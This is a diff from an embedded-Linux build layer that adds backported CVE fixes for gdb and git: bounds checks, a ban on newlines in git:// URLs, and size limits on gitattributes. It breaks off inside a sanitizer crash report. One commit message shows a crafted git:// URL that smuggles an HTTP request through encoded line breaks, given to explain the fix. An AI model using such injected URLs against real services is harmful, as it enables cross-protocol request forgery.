+++ b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
diff --git a/meta/recipes-devtools/gdb/gdb-9.1.inc b/meta/recipes-devtools/gdb/gdb-9.1.inc
index d019e6b384..212c554cf1 100644
--- a/meta/recipes-devtools/gdb/gdb-9.1.inc
+++ b/meta/recipes-devtools/gdb/gdb-9.1.inc
@@ -16,6 +16,7 @@ SRC_URI = "${GNU_MIRROR}/gdb/gdb-${PV}.tar.xz \
16 file://0009-resolve-restrict-keyword-conflict.patch \ 16 file://0009-resolve-restrict-keyword-conflict.patch \
17 file://0010-Fix-invalid-sigprocmask-call.patch \ 17 file://0010-Fix-invalid-sigprocmask-call.patch \
18 file://0011-gdbserver-ctrl-c-handling.patch \ 18 file://0011-gdbserver-ctrl-c-handling.patch \
19 file://0012-CVE-2023-39128.patch \
19 " 20 "
20SRC_URI[md5sum] = "f7e9f6236c425097d9e5f18a6ac40655" 21SRC_URI[md5sum] = "f7e9f6236c425097d9e5f18a6ac40655"
21SRC_URI[sha256sum] = "699e0ec832fdd2f21c8266171ea5bf44024bd05164fdf064e4d10cc4cf0d1737" 22SRC_URI[sha256sum] = "699e0ec832fdd2f21c8266171ea5bf44024bd05164fdf064e4d10cc4cf0d1737"
diff --git a/meta/recipes-devtools/gdb/gdb-common.inc b/meta/recipes-devtools/gdb/gdb-common.inc
index 08f615addf..7a4793a73f 100644
--- a/meta/recipes-devtools/gdb/gdb-common.inc
+++ b/meta/recipes-devtools/gdb/gdb-common.inc
@@ -1,5 +1,6 @@
1SUMMARY = "GNU debugger" 1SUMMARY = "GNU debugger"
2HOMEPAGE = "http://www.gnu.org/software/gdb/" 2HOMEPAGE = "http://www.gnu.org/software/gdb/"
3DESCRIPTION = "GDB, the GNU Project debugger, allows you to see what is going on inside another program while it executes -- or what another program was doing at the moment it crashed."
3SECTION = "devel" 4SECTION = "devel"
4DEPENDS = "expat zlib ncurses virtual/libiconv ${LTTNGUST} bison-native" 5DEPENDS = "expat zlib ncurses virtual/libiconv ${LTTNGUST} bison-native"
5 6
diff --git a/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
new file mode 100644
index 0000000000..6445455bde
--- /dev/null
+++ b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
@@ -0,0 +1,75 @@
1From 033bc52bb6190393c8eed80925fa78cc35b40c6d Mon Sep 17 00:00:00 2001
2From: Tom Tromey <tromey@adacore.com>
3Date: Wed, 16 Aug 2023 11:29:19 -0600
4Subject: [PATCH] Avoid buffer overflow in ada_decode
5
6A bug report pointed out a buffer overflow in ada_decode, which Keith
7helpfully analyzed. ada_decode had a logic error when the input was
8all digits. While this isn't valid -- and would probably only appear
9in fuzzer tests -- it still should be handled properly.
10
11This patch adds a missing bounds check. Tested with the self-tests in
12an asan build.
13
14Bug: https://sourceware.org/bugzilla/show_bug.cgi?id=30639
15Reviewed-by: Keith Seitz <keiths@redhat.com>
16
17Upstream-Status: Backport from [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=033bc52bb6190393c8eed80925fa78cc35b40c6d]
18CVE: CVE-2023-39128
19Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
20---
21 gdb/ada-lang.c | 19 ++++++++++++++++++-
22 1 file changed, 18 insertions(+), 1 deletion(-)
23
24diff --git a/gdb/ada-lang.c b/gdb/ada-lang.c
25index 0c2d4fc..40852b6 100644
26--- a/gdb/ada-lang.c
27+++ b/gdb/ada-lang.c
28@@ -56,6 +56,7 @@
29 #include "cli/cli-utils.h"
30 #include "gdbsupport/function-view.h"
31 #include "gdbsupport/byte-vector.h"
32+#include "gdbsupport/selftest.h"
33 #include <algorithm>
34
35 /* Define whether or not the C operator '/' truncates towards zero for
36@@ -1184,7 +1185,7 @@ ada_decode (const char *encoded)
37 i -= 1;
38 if (i > 1 && encoded[i] == '_' && encoded[i - 1] == '_')
39 len0 = i - 1;
40- else if (encoded[i] == '$')
41+ else if (i >= 0 && encoded[i] == '$')
42 len0 = i;
43 }
44
45@@ -1350,6 +1351,18 @@ Suppress:
46
47 }
48
49+#ifdef GDB_SELF_TEST
50+
51+static void
52+ada_decode_tests ()
53+{
54+ /* This isn't valid, but used to cause a crash. PR gdb/30639. The
55+ result does not really matter very much. */
56+ SELF_CHECK (ada_decode ("44") == "44");
57+}
58+
59+#endif
60+
61 /* Table for keeping permanent unique copies of decoded names. Once
62 allocated, names in this table are never released. While this is a
63 storage leak, it should not be significant unless there are massive
64@@ -14345,4 +14358,8 @@ DWARF attribute."),
65 gdb::observers::new_objfile.attach (ada_new_objfile_observer);
66 gdb::observers::free_objfile.attach (ada_free_objfile_observer);
67 gdb::observers::inferior_exit.attach (ada_inferior_exit);
68+
69+#ifdef GDB_SELF_TEST
70+ selftests::register_test ("ada-decode", ada_decode_tests);
71+#endif
72 }
73--
742.24.4
75
diff --git a/meta/recipes-devtools/git/files/CVE-2021-40330.patch b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
new file mode 100644
index 0000000000..725f98f0b7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
@@ -0,0 +1,108 @@
1From e77ca0c7d577408878d2b3e8c7336e6119cb3931 Mon Sep 17 00:00:00 2001
2From: Minjae Kim <flowergom@gmail.com>
3Date: Thu, 25 Nov 2021 06:36:26 +0000
4Subject: [PATCH] git_connect_git(): forbid newlines in host and path
5
6When we connect to a git:// server, we send an initial request that
7looks something like:
8
9 002dgit-upload-pack repo.git\0host=example.com
10
11If the repo path contains a newline, then it's included literally, and
12we get:
13
14 002egit-upload-pack repo
15 .git\0host=example.com
16
17This works fine if you really do have a newline in your repository name;
18the server side uses the pktline framing to parse the string, not
19newlines. However, there are many _other_ protocols in the wild that do
20parse on newlines, such as HTTP. So a carefully constructed git:// URL
21can actually turn into a valid HTTP request. For example:
22
23 git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a
24
25becomes:
26
27 0050git-upload-pack /
28 GET / HTTP/1.1
29 Host:localhost
30
31 host=localhost:1234
32
33on the wire. Again, this isn't a problem for a real Git server, but it
34does mean that feeding a malicious URL to Git (e.g., through a
35submodule) can cause it to make unexpected cross-protocol requests.
36Since repository names with newlines are presumably quite rare (and
37indeed, we already disallow them in git-over-http), let's just disallow
38them over this protocol.
39
40Hostnames could likewise inject a newline, but this is unlikely a
41problem in practice; we'd try resolving the hostname with a newline in
42it, which wouldn't work. Still, it doesn't hurt to err on the side of
43caution there, since we would not expect them to work in the first
44place.
45
46The ssh and local code paths are unaffected by this patch. In both cases
47we're trying to run upload-pack via a shell, and will quote the newline
48so that it makes it intact. An attacker can point an ssh url at an
49arbitrary port, of course, but unless there's an actual ssh server
50there, we'd never get as far as sending our shell command anyway. We
51_could_ similarly restrict newlines in those protocols out of caution,
52but there seems little benefit to doing so.
53
54The new test here is run alongside the git-daemon tests, which cover the
55same protocol, but it shouldn't actually contact the daemon at all. In
56theory we could make the test more robust by setting up an actual
57repository with a newline in it (so that our clone would succeed if our
58new check didn't kick in). But a repo directory with newline in it is
59likely not portable across all filesystems. Likewise, we could check
60git-daemon's log that it was not contacted at all, but we do not
61currently record the log (and anyway, it would make the test racy with
62the daemon's log write). We'll just check the client-side stderr to make
63sure we hit the expected code path.
64
65Reported-by: Harold Kim <h.kim@flatt.tech>
66Signed-off-by: Jeff King <peff@peff.net>
67Signed-off-by: Junio C Hamano <gitster@pobox.com>
68
69Upstream-Status: Backported [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473]
70CVE: CVE-2021-40330
71Signed-off-by: Minjae Kim <flowergom@gmail.com>
72---
73 connect.c | 2 ++
74 t/t5570-git-daemon.sh | 5 +++++
75 2 files changed, 7 insertions(+)
76
77diff --git a/connect.c b/connect.c
78index b6451ab..929de9a 100644
79--- a/connect.c
80+++ b/connect.c
81@@ -1064,6 +1064,8 @@ static struct child_process *git_connect_git(int fd[2], char *hostandport,
82 target_host = xstrdup(hostandport);
83
84 transport_check_allowed("git");
85+ if (strchr(target_host, '\n') || strchr(path, '\n'))
86+ die(_("newline is forbidden in git:// hosts and repo paths"));
87
88 /*
89 * These underlying connection commands die() if they
90diff --git a/t/t5570-git-daemon.sh b/t/t5570-git-daemon.sh
91index 34487bb..79cd218 100755
92--- a/t/t5570-git-daemon.sh
93+++ b/t/t5570-git-daemon.sh
94@@ -103,6 +103,11 @@ test_expect_success 'fetch notices corrupt idx' '
95 )
96 '
97
98+test_expect_success 'client refuses to ask for repo with newline' '
99+ test_must_fail git clone "$GIT_DAEMON_URL/repo$LF.git" dst 2>stderr &&
100+ test_i18ngrep newline.is.forbidden stderr
101+'
102+
103 test_remote_error()
104 {
105 do_export=YesPlease
106--
1072.17.1
108
diff --git a/meta/recipes-devtools/git/files/CVE-2022-23521.patch b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
new file mode 100644
index 0000000000..974546013d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
@@ -0,0 +1,367 @@
1From eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:45:15 +0100
4Subject: [PATCH] CVE-2022-23521
5
6attr: fix overflow when upserting attribute with overly long name
7
8The function `git_attr_internal()` is called to upsert attributes into
9the global map. And while all callers pass a `size_t`, the function
10itself accepts an `int` as the attribute name's length. This can lead to
11an integer overflow in case the attribute name is longer than `INT_MAX`.
12
13Now this overflow seems harmless as the first thing we do is to call
14`attr_name_valid()`, and that function only succeeds in case all chars
15in the range of `namelen` match a certain small set of chars. We thus
16can't do an out-of-bounds read as NUL is not part of that set and all
17strings passed to this function are NUL-terminated. And furthermore, we
18wouldn't ever read past the current attribute name anyway due to the
19same reason. And if validation fails we will return early.
20
21On the other hand it feels fragile to rely on this behaviour, even more
22so given that we pass `namelen` to `FLEX_ALLOC_MEM()`. So let's instead
23just do the correct thing here and accept a `size_t` as line length.
24
25Upstream-Status: Backport [https://github.com/git/git/commit/eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 &https://github.com/git/git/commit/8d0d48cf2157cfb914db1f53b3fe40785b86f3aa & https://github.com/git/git/commit/24557209500e6ed618f04a8795a111a0c491a29c & https://github.com/git/git/commit/34ace8bad02bb14ecc5b631f7e3daaa7a9bba7d9 & https://github.com/git/git/commit/447ac906e189535e77dcb1f4bbe3f1bc917d4c12 & https://github.com/git/git/commit/e1e12e97ac73ded85f7d000da1063a774b3cc14f & https://github.com/git/git/commit/a60a66e409c265b2944f18bf43581c146812586d & https://github.com/git/git/commit/d74b1fd54fdbc45966d12ea907dece11e072fb2b & https://github.com/git/git/commit/dfa6b32b5e599d97448337ed4fc18dd50c90758f & https://github.com/git/git/commit/3c50032ff5289cc45659f21949c8d09e52164579
26
27CVE: CVE-2022-23521
28
29Reviewed-by: Sylvain Beucler <beuc@debian.org>
30Signed-off-by: Patrick Steinhardt <ps@pks.im>
31Signed-off-by: Junio C Hamano <gitster@pobox.com>
32Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
33---
34 attr.c | 97 +++++++++++++++++++++++++++----------------
35 attr.h | 12 ++++++
36 t/t0003-attributes.sh | 59 ++++++++++++++++++++++++++
37 3 files changed, 132 insertions(+), 36 deletions(-)
38
39diff --git a/attr.c b/attr.c
40index 11f19b5..63484ab 100644
41--- a/attr.c
42+++ b/attr.c
43@@ -29,7 +29,7 @@ static const char git_attr__unknown[] = "(builtin)unknown";
44 #endif
45
46 struct git_attr {
47- int attr_nr; /* unique attribute number */
48+ unsigned int attr_nr; /* unique attribute number */
49 char name[FLEX_ARRAY]; /* attribute name */
50 };
51
52@@ -221,7 +221,7 @@ static void report_invalid_attr(const char *name, size_t len,
53 * dictionary. If no entry is found, create a new attribute and store it in
54 * the dictionary.
55 */
56-static const struct git_attr *git_attr_internal(const char *name, int namelen)
57+static const struct git_attr *git_attr_internal(const char *name, size_t namelen)
58 {
59 struct git_attr *a;
60
61@@ -237,8 +237,8 @@ static const struct git_attr *git_attr_internal(const char *name, int namelen)
62 a->attr_nr = hashmap_get_size(&g_attr_hashmap.map);
63
64 attr_hashmap_add(&g_attr_hashmap, a->name, namelen, a);
65- assert(a->attr_nr ==
66- (hashmap_get_size(&g_attr_hashmap.map) - 1));
67+ if (a->attr_nr != hashmap_get_size(&g_attr_hashmap.map) - 1)
68+ die(_("unable to add additional attribute"));
69 }
70
71 hashmap_unlock(&g_attr_hashmap);
72@@ -283,7 +283,7 @@ struct match_attr {
73 const struct git_attr *attr;
74 } u;
75 char is_macro;
76- unsigned num_attr;
77+ size_t num_attr;
78 struct attr_state state[FLEX_ARRAY];
79 };
80
81@@ -300,7 +300,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
82 struct attr_state *e)
83 {
84 const char *ep, *equals;
85- int len;
86+ size_t len;
87
88 ep = cp + strcspn(cp, blank);
89 equals = strchr(cp, '=');
90@@ -344,8 +344,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
91 static struct match_attr *parse_attr_line(const char *line, const char *src,
92 int lineno, int macro_ok)
93 {
94- int namelen;
95- int num_attr, i;
96+ size_t namelen, num_attr, i;
97 const char *cp, *name, *states;
98 struct match_attr *res = NULL;
99 int is_macro;
100@@ -356,6 +355,11 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
101 return NULL;
102 name = cp;
103
104+ if (strlen(line) >= ATTR_MAX_LINE_LENGTH) {
105+ warning(_("ignoring overly long attributes line %d"), lineno);
106+ return NULL;
107+ }
108+
109 if (*cp == '"' && !unquote_c_style(&pattern, name, &states)) {
110 name = pattern.buf;
111 namelen = pattern.len;
112@@ -392,10 +396,9 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
113 goto fail_return;
114 }
115
116- res = xcalloc(1,
117- sizeof(*res) +
118- sizeof(struct attr_state) * num_attr +
119- (is_macro ? 0 : namelen + 1));
120+ res = xcalloc(1, st_add3(sizeof(*res),
121+ st_mult(sizeof(struct attr_state), num_attr),
122+ is_macro ? 0 : namelen + 1));
123 if (is_macro) {
124 res->u.attr = git_attr_internal(name, namelen);
125 } else {
126@@ -458,11 +461,12 @@ struct attr_stack {
127
128 static void attr_stack_free(struct attr_stack *e)
129 {
130- int i;
131+ unsigned i;
132 free(e->origin);
133 for (i = 0; i < e->num_matches; i++) {
134 struct match_attr *a = e->attrs[i];
135- int j;
136+ size_t j;
137+
138 for (j = 0; j < a->num_attr; j++) {
139 const char *setto = a->state[j].setto;
140 if (setto == ATTR__TRUE ||
141@@ -671,8 +675,8 @@ static void handle_attr_line(struct attr_stack *res,
142 a = parse_attr_line(line, src, lineno, macro_ok);
143 if (!a)
144 return;
145- ALLOC_GROW(res->attrs, res->num_matches + 1, res->alloc);
146- res->attrs[res->num_matches++] = a;
147+ ALLOC_GROW_BY(res->attrs, res->num_matches, 1, res->alloc);
148+ res->attrs[res->num_matches - 1] = a;
149 }
150
151 static struct attr_stack *read_attr_from_array(const char **list)
152@@ -711,21 +715,37 @@ void git_attr_set_direction(enum git_attr_direction new_direction)
153
154 static struct attr_stack *read_attr_from_file(const char *path, int macro_ok)
155 {
156+ struct strbuf buf = STRBUF_INIT;
157 FILE *fp = fopen_or_warn(path, "r");
158 struct attr_stack *res;
159- char buf[2048];
160 int lineno = 0;
161+ int fd;
162+ struct stat st;
163
164 if (!fp)
165 return NULL;
166- res = xcalloc(1, sizeof(*res));
167- while (fgets(buf, sizeof(buf), fp)) {
168- char *bufp = buf;
169- if (!lineno)
170- skip_utf8_bom(&bufp, strlen(bufp));
171- handle_attr_line(res, bufp, path, ++lineno, macro_ok);
172+
173+ fd = fileno(fp);
174+ if (fstat(fd, &st)) {
175+ warning_errno(_("cannot fstat gitattributes file '%s'"), path);
176+ fclose(fp);
177+ return NULL;
178 }
179+ if (st.st_size >= ATTR_MAX_FILE_SIZE) {
180+ warning(_("ignoring overly large gitattributes file '%s'"), path);
181+ fclose(fp);
182+ return NULL;
183+ }
184+
185+ CALLOC_ARRAY(res, 1);
186+ while (strbuf_getline(&buf, fp) != EOF) {
187+ if (!lineno && starts_with(buf.buf, utf8_bom))
188+ strbuf_remove(&buf, 0, strlen(utf8_bom));
189+ handle_attr_line(res, buf.buf, path, ++lineno, macro_ok);
190+ }
191+
192 fclose(fp);
193+ strbuf_release(&buf);
194 return res;
195 }
196
197@@ -736,13 +756,18 @@ static struct attr_stack *read_attr_from_index(const struct index_state *istate,
198 struct attr_stack *res;
199 char *buf, *sp;
200 int lineno = 0;
201+ size_t size;
202
203 if (!istate)
204 return NULL;
205
206- buf = read_blob_data_from_index(istate, path, NULL);
207+ buf = read_blob_data_from_index(istate, path, &size);
208 if (!buf)
209 return NULL;
210+ if (size >= ATTR_MAX_FILE_SIZE) {
211+ warning(_("ignoring overly large gitattributes blob '%s'"), path);
212+ return NULL;
213+ }
214
215 res = xcalloc(1, sizeof(*res));
216 for (sp = buf; *sp; ) {
217@@ -1012,12 +1037,12 @@ static int macroexpand_one(struct all_attrs_item *all_attrs, int nr, int rem);
218 static int fill_one(const char *what, struct all_attrs_item *all_attrs,
219 const struct match_attr *a, int rem)
220 {
221- int i;
222+ size_t i;
223
224- for (i = a->num_attr - 1; rem > 0 && i >= 0; i--) {
225- const struct git_attr *attr = a->state[i].attr;
226+ for (i = a->num_attr; rem > 0 && i > 0; i--) {
227+ const struct git_attr *attr = a->state[i - 1].attr;
228 const char **n = &(all_attrs[attr->attr_nr].value);
229- const char *v = a->state[i].setto;
230+ const char *v = a->state[i - 1].setto;
231
232 if (*n == ATTR__UNKNOWN) {
233 debug_set(what,
234@@ -1036,11 +1061,11 @@ static int fill(const char *path, int pathlen, int basename_offset,
235 struct all_attrs_item *all_attrs, int rem)
236 {
237 for (; rem > 0 && stack; stack = stack->prev) {
238- int i;
239+ unsigned i;
240 const char *base = stack->origin ? stack->origin : "";
241
242- for (i = stack->num_matches - 1; 0 < rem && 0 <= i; i--) {
243- const struct match_attr *a = stack->attrs[i];
244+ for (i = stack->num_matches; 0 < rem && 0 < i; i--) {
245+ const struct match_attr *a = stack->attrs[i - 1];
246 if (a->is_macro)
247 continue;
248 if (path_matches(path, pathlen, basename_offset,
249@@ -1071,11 +1096,11 @@ static void determine_macros(struct all_attrs_item *all_attrs,
250 const struct attr_stack *stack)
251 {
252 for (; stack; stack = stack->prev) {
253- int i;
254- for (i = stack->num_matches - 1; i >= 0; i--) {
255- const struct match_attr *ma = stack->attrs[i];
256+ unsigned i;
257+ for (i = stack->num_matches; i > 0; i--) {
258+ const struct match_attr *ma = stack->attrs[i - 1];
259 if (ma->is_macro) {
260- int n = ma->u.attr->attr_nr;
261+ unsigned int n = ma->u.attr->attr_nr;
262 if (!all_attrs[n].macro) {
263 all_attrs[n].macro = ma;
264 }
265@@ -1127,7 +1152,7 @@ void git_check_attr(const struct index_state *istate,
266 collect_some_attrs(istate, path, check);
267
268 for (i = 0; i < check->nr; i++) {
269- size_t n = check->items[i].attr->attr_nr;
270+ unsigned int n = check->items[i].attr->attr_nr;
271 const char *value = check->all_attrs[n].value;
272 if (value == ATTR__UNKNOWN)
273 value = ATTR__UNSET;
274diff --git a/attr.h b/attr.h
275index b0378bf..f424285 100644
276--- a/attr.h
277+++ b/attr.h
278@@ -1,6 +1,18 @@
279 #ifndef ATTR_H
280 #define ATTR_H
281
282+/**
283+ * The maximum line length for a gitattributes file. If the line exceeds this
284+ * length we will ignore it.
285+ */
286+#define ATTR_MAX_LINE_LENGTH 2048
287+
288+ /**
289+ * The maximum size of the giattributes file. If the file exceeds this size we
290+ * will ignore it.
291+ */
292+#define ATTR_MAX_FILE_SIZE (100 * 1024 * 1024)
293+
294 struct index_state;
295
296 /* An attribute is a pointer to this opaque structure */
297diff --git a/t/t0003-attributes.sh b/t/t0003-attributes.sh
298index 71e63d8..556245b 100755
299--- a/t/t0003-attributes.sh
300+++ b/t/t0003-attributes.sh
301@@ -342,4 +342,63 @@ test_expect_success 'query binary macro directly' '
302 test_cmp expect actual
303 '
304
305+test_expect_success 'large attributes line ignored in tree' '
306+ test_when_finished "rm .gitattributes" &&
307+ printf "path %02043d" 1 >.gitattributes &&
308+ git check-attr --all path >actual 2>err &&
309+ echo "warning: ignoring overly long attributes line 1" >expect &&
310+ test_cmp expect err &&
311+ test_must_be_empty actual
312+'
313+
314+test_expect_success 'large attributes line ignores trailing content in tree' '
315+ test_when_finished "rm .gitattributes" &&
316+ # older versions of Git broke lines at 2048 bytes; the 2045 bytes
317+ # of 0-padding here is accounting for the three bytes of "a 1", which
318+ # would knock "trailing" to the "next" line, where it would be
319+ # erroneously parsed.
320+ printf "a %02045dtrailing attribute\n" 1 >.gitattributes &&
321+ git check-attr --all trailing >actual 2>err &&
322+ echo "warning: ignoring overly long attributes line 1" >expect &&
323+ test_cmp expect err &&
324+ test_must_be_empty actual
325+'
326+
327+test_expect_success EXPENSIVE 'large attributes file ignored in tree' '
328+ test_when_finished "rm .gitattributes" &&
329+ dd if=/dev/zero of=.gitattributes bs=101M count=1 2>/dev/null &&
330+ git check-attr --all path >/dev/null 2>err &&
331+ echo "warning: ignoring overly large gitattributes file ${SQ}.gitattributes${SQ}" >expect &&
332+ test_cmp expect err
333+'
334+
335+test_expect_success 'large attributes line ignored in index' '
336+ test_when_finished "git update-index --remove .gitattributes" &&
337+ blob=$(printf "path %02043d" 1 | git hash-object -w --stdin) &&
338+ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
339+ git check-attr --cached --all path >actual 2>err &&
340+ echo "warning: ignoring overly long attributes line 1" >expect &&
341+ test_cmp expect err &&
342+ test_must_be_empty actual
343+'
344+
345+test_expect_success 'large attributes line ignores trailing content in index' '
346+ test_when_finished "git update-index --remove .gitattributes" &&
347+ blob=$(printf "a %02045dtrailing attribute\n" 1 | git hash-object -w --stdin) &&
348+ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
349+ git check-attr --cached --all trailing >actual 2>err &&
350+ echo "warning: ignoring overly long attributes line 1" >expect &&
351+ test_cmp expect err &&
352+ test_must_be_empty actual
353+'
354+
355+test_expect_success EXPENSIVE 'large attributes file ignored in index' '
356+ test_when_finished "git update-index --remove .gitattributes" &&
357+ blob=$(dd if=/dev/zero bs=101M count=1 2>/dev/null | git hash-object -w --stdin) &&
358+ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
359+ git check-attr --cached --all path >/dev/null 2>err &&
360+ echo "warning: ignoring overly large gitattributes blob ${SQ}.gitattributes${SQ}" >expect &&
361+ test_cmp expect err
362+'
363+
364 test_done
365--
3662.25.1
367
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
new file mode 100644
index 0000000000..87091abd47
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
@@ -0,0 +1,39 @@
1From a244dc5b0a629290881641467c7a545de7508ab2 Mon Sep 17 00:00:00 2001
2From: Carlo Marcelo Arenas Belón <carenas@gmail.com>
3Date: Tue, 2 Nov 2021 15:46:06 +0000
4Subject: [PATCH 01/12] test-lib: add prerequisite for 64-bit platforms
5
6Allow tests that assume a 64-bit `size_t` to be skipped in 32-bit
7platforms and regardless of the size of `long`.
8
9This imitates the `LONG_IS_64BIT` prerequisite.
10
11Signed-off-by: Carlo Marcelo Arenas Belón <carenas@gmail.com>
12Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
13Signed-off-by: Junio C Hamano <gitster@pobox.com>
14
15Upstream-Status: Backport [https://github.com/git/git/commit/a244dc5b0a629290881641467c7a545de7508ab2]
16CVE: CVE-2022-41903
17Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
18---
19 t/test-lib.sh | 4 ++++
20 1 file changed, 4 insertions(+)
21
22diff --git a/t/test-lib.sh b/t/test-lib.sh
23index e06fa02..db5ec2f 100644
24--- a/t/test-lib.sh
25+++ b/t/test-lib.sh
26@@ -1613,6 +1613,10 @@ build_option () {
27 sed -ne "s/^$1: //p"
28 }
29
30+test_lazy_prereq SIZE_T_IS_64BIT '
31+ test 8 -eq "$(build_option sizeof-size_t)"
32+'
33+
34 test_lazy_prereq LONG_IS_64BIT '
35 test 8 -le "$(build_option sizeof-long)"
36 '
37--
382.25.1
39
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
new file mode 100644
index 0000000000..f35e55b585
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
@@ -0,0 +1,187 @@
1From 81dc898df9b4b4035534a927f3234a3839b698bf Mon Sep 17 00:00:00 2001
2From: Patrick Steinhardt <ps@pks.im>
3Date: Thu, 1 Dec 2022 15:46:25 +0100
4Subject: [PATCH 02/12] pretty: fix out-of-bounds write caused by integer overflow
5
6When using a padding specifier in the pretty format passed to git-log(1)
7we need to calculate the string length in several places. These string
8lengths are stored in `int`s though, which means that these can easily
9overflow when the input lengths exceeds 2GB. This can ultimately lead to
10an out-of-bounds write when these are used in a call to memcpy(3P):
11
12 ==8340==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1ec62f97fe at pc 0x7f2127e5f427 bp 0x7ffd3bd63de0 sp 0x7ffd3bd63588
13 WRITE of size 1 at 0x7f1ec62f97fe thread T0
14 #0 0x7f2127e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
15 #1 0x5628e96aa605 in format_and_pad_commit pretty.c:1762
16 #2 0x5628e96aa7f4 in format_commit_item pretty.c:1801
17 #3 0x5628e97cdb24 in strbuf_expand strbuf.c:429
18 #4 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
19 #5 0x5628e96acd0f in pretty_print_commit pretty.c:2161
20 #6 0x5628e95a44c8 in show_log log-tree.c:781
21 #7 0x5628e95a76ba in log_tree_commit log-tree.c:1117
22 #8 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
23 #9 0x5628e922c35b in cmd_log_walk builtin/log.c:549
24 #10 0x5628e922f1a2 in cmd_log builtin/log.c:883
25 #11 0x5628e9106993 in run_builtin git.c:466
26 #12 0x5628e9107397 in handle_builtin git.c:721
27 #13 0x5628e9107b07 in run_argv git.c:788
28 #14 0x5628e91088a7 in cmd_main git.c:923
29 #15 0x5628e939d682 in main common-main.c:57
30 #16 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
31 #17 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
32 #18 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
33
34 0x7f1ec62f97fe is located 2 bytes to the left of 4831838265-byte region [0x7f1ec62f9800,0x7f1fe62f9839)
35 allocated by thread T0 here:
36 #0 0x7f2127ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
37 #1 0x5628e98774d4 in xrealloc wrapper.c:136
38 #2 0x5628e97cb01c in strbuf_grow strbuf.c:99
39 #3 0x5628e97ccd42 in strbuf_addchars strbuf.c:327
40 #4 0x5628e96aa55c in format_and_pad_commit pretty.c:1761
41 #5 0x5628e96aa7f4 in format_commit_item pretty.c:1801
42 #6 0x5628e97cdb24 in strbuf_expand strbuf.c:429
43 #7 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
44 #8 0x5628e96acd0f in pretty_print_commit pretty.c:2161
45 #9 0x5628e95a44c8 in show_log log-tree.c:781
46 #10 0x5628e95a76ba in log_tree_commit log-tree.c:1117
47 #11 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
48 #12 0x5628e922c35b in cmd_log_walk builtin/log.c:549
49 #13 0x5628e922f1a2 in cmd_log builtin/log.c:883
50 #14 0x5628e9106993 in run_builtin git.c:466
51 #15 0x5628e9107397 in handle_builtin git.c:721
52 #16 0x5628e9107b07 in run_argv git.c:788
53 #17 0x5628e91088a7 in cmd_main git.c:923
54 #18 0x5628e939d682 in main common-main.c:57
55 #19 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
56 #20 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
57 #21 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
58
59 SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
60 Shadow bytes around the buggy address:
61 0x0fe458c572a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
62 0x0fe458c572b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
63 0x0fe458c572c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
64 0x0fe458c572d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
65 0x0fe458c572e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
66 =>0x0fe458c572f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
67 0x0fe458c57300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
68 0x0fe458c57310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
69 0x0fe458c57320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
70 0x0fe458c57330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
71 0x0fe458c57340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
72 Shadow byte legend (one shadow byte represents 8 application bytes):
73 Addressable: 00
